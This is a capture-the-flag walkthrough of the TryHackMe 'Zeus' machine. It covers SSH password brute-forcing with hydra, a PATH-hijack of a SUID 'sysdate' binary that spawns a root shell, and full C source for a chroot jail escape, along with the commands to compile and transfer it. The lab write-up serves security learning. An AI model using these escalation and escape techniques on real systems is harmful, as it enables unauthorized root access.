Deploy this VM and follow along with me!

There is no need to download the virtual machine and configure it, as you can simply deploy it in the cloud using TryHackMe here.

Nmap

Let's start with an nmap scan:

(screenshot: nmap scan output)

Okay, no unusual ports are open. Let's start with FTP, since it allows anonymous login.

FTP

Perhaps something will appear over FTP.

(screenshot: anonymous FTP login)

I got nothing from the FTP server because I was not able to list the directory. I tried passive mode as well, but still nothing. So I left it as it was and moved on to HTTP enumeration.

HTTP

(screenshot: login form on port 80)

From our nmap scan we know port 80 is open. Visiting it shows a login form. I tried some basic SQLi like 1=1' or admin' -- on it, but it did not seem to be vulnerable to SQLi. So I ran dirsearch against the website to see if I could find anything interesting.

(screenshot: dirsearch results)

I tried visiting /backups but got nothing, and visiting the /telecom directory gave me a blank page. However, there was a comment in the source of that page!

(screenshot: page source of /telecom)

It says the website will be updated by gogu. This comment tells us that there is a user named gogu.

From here I spent some time trying to find something else that would be of use, but couldn't, so I started a dictionary attack against the SSH service. I managed to get the password for gogu with that dictionary attack.

(screenshot: hydra output)

gogu: universal

Note: I tried to run the dictionary attack against FTP as well, but the connection kept dropping. It also took me 1h 5m to get the correct password using the rockyou wordlist.

Since we have the credentials, we can just log in and get our user flag.

(screenshot: user flag)

Privilege escalation

The interesting thing was that this machine had almost nothing installed, and by nothing I mean only a few binaries, so there was nothing like python or netcat.
</gre_replace>
<gr_replace lines="46" cat="reformat" orig="jail">
(screenshot: restricted shell with only a few binaries)

jail

I thought it was going to be some kind of jail escape for privesc, but I didn't find anything related to this on Google, so I dropped the whole JAIL ESCAPE idea and continued looking for something else.

In the gogu home directory there's a binary named hackme. I tried running it but it did nothing, i.e. when I executed it, it gave no output.

Interestingly, there was a folder in /home/gogu named ....

(screenshot: listing of the .... folder)

In that folder there was a file named sysdate, owned by root with the setuid bit set, meaning it's a SUID binary 😏😏

(screenshot: permissions of sysdate)

The binary prints the system date and time.

(screenshot: output of sysdate)

Now we need to analyze that binary so we can exploit it and get root access.

We can't get this binary onto our local system, for a number of reasons:

  1. There is no wget/python to do so (you could do it over SSH, but see point 2).
  2. The moment we copy it to our system and put it back, it loses its SUID privileges, so there's no point.

So, to see what the binary does to produce its output, I ran cat on it.

(screenshot: cat of the sysdate binary)

It runs the date command and greps for EEST. This is easy to exploit: we can create a file named date containing a shell, then run sysdate, and it will give us a shell.

WHY?

Because the binary calls date rather than /bin/date, i.e. no absolute path is given, so the date that runs is whichever one is found first in our PATH.

Run the following commands:

  • echo "/bin/sh -i" >> date
  • chmod +x date
  • export PATH=.:$PATH

and then run ./sysdate and BOOM!! 💥💥

(screenshot: root shell from sysdate)

We got a root shell, and now we just need to get the root flag.

(screenshot: root shell unable to see root)

Even though we have a root shell, we are still stuck in that jail shell (I knew it was a jail), and that is why we can't see root. DAMN!!!! 😡😡😡

Onto escaping the jail...

Jail escape

Now, since I was sure we needed to find a way to escape this jail, I decided to look specifically for jails. After some further research and banging my head against the wall, I finally figured out how to escape it.

The jail we were in is a chroot jail. I found an article about escaping a chroot jail, and that blog post has C code which we can use to escape it.

#include <sys/stat.h>
#include <unistd.h>
#include <fcntl.h>
#include <stddef.h>

int main(void) {
    int dir_fd, x;
    /* The escape only works because we are already root inside the jail
       (chroot() needs CAP_SYS_CHROOT); a jail that dropped privileges
       after chroot() would stop it right here. */
    setuid(0);
    /* Create a sub-directory and keep an open handle to the current
       directory; the handle stays valid after the root changes. */
    mkdir(".42", 0755);
    dir_fd = open(".", O_RDONLY);
    /* Move the root into the sub-directory. The kernel does not change
       the working directory, so we are now outside the new root. */
    chroot(".42");
    fchdir(dir_fd);
    close(dir_fd);
    /* Walk up until we reach the real filesystem root, then make that
       our root again. */
    for (x = 0; x < 1000; x++) chdir("..");
    chroot(".");
    /* argv[0] must be the program name; "-i" asks for an interactive shell. */
    return execl("/bin/sh", "sh", "-i", (char *)NULL);
}

Put that code in a file named escape.c and then compile the binary using the following command:

➜ gcc escape.c -o escape -m32

Command explanation

  • escape.c - Name of the file containing the exploit code.
  • -o escape - gcc will produce a binary named escape.
  • -m32 - Produce a 32-bit binary.

Now we can send this file to the machine via SSH. The best method is to use the cat command in the following way:

➜ ssh gogu@192.168.131.170 "cat> escape" < escape

This command sends the contents of the local escape file over SSH into a file on the machine, also named escape. After running it, you will see a binary named escape in the gogu home directory.

(screenshot: escape binary transferred over SSH)

Now we need to run that binary as root through sysdate. Run the following commands:

  • echo "/home/gogu/escape">date;
  • chmod +x date;
  • export PATH=/home/gogu:$PATH

Note: Don't forget to change the permissions of the escape file, i.e. run chmod +x escape, after getting it onto the machine. I forgot to do it 😜😜😜

Now just run sysdate and you'll get root.

(screenshot: root flag)

Final Consideration

Zeus is a pretty good machine that teaches you how file permissions can have a huge impact on your system. It also educates you on how jails work. All in all, this was an awesome machine.

Personally, I really liked the whole jail escape concept. I had not done any machine in which I was root but couldn't read the root flag.

Thanks to @SirPwnALot for making such a great machine (which is hosted on TryHackMe). I hope this article has contributed something to your knowledge and learning.

I've written writeups on quite a few Vulnhub boxes; make sure you check them out on my blog.

Follow me @0xmzfr for more Writeups.

Credits to Muhammed Sajid on Dribble for the artwork.

Thanks for reading. Feedback is always appreciated.